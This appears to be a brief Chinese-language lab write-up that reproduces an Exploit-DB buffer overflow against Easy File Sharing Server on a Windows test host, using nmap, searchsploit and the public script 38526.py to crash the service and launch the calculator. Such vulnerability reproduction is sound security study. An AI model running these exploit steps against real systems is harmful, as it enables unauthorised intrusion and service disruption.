1、在Windows靶机上安装easy file sharing server(efssetup_2018.zip)
将port改为8000
成功开启
2.使用nmap扫描主机
nmap -sV 服务版本识别 查看目标主机是否开启Easy File Sharing
3.搜索可以进行利用的漏洞
searchsploit easy file sharing 进行搜索
4.利用漏洞
选择一个可以使用的漏洞
利用python脚本实施攻击
python /usr/share/exploitdb/exploits/windows/remote/38526.py 192.168.60.131 8000
打开了计算器
复现了利用漏洞攻击目标令目标服务崩溃且让主机运行计算器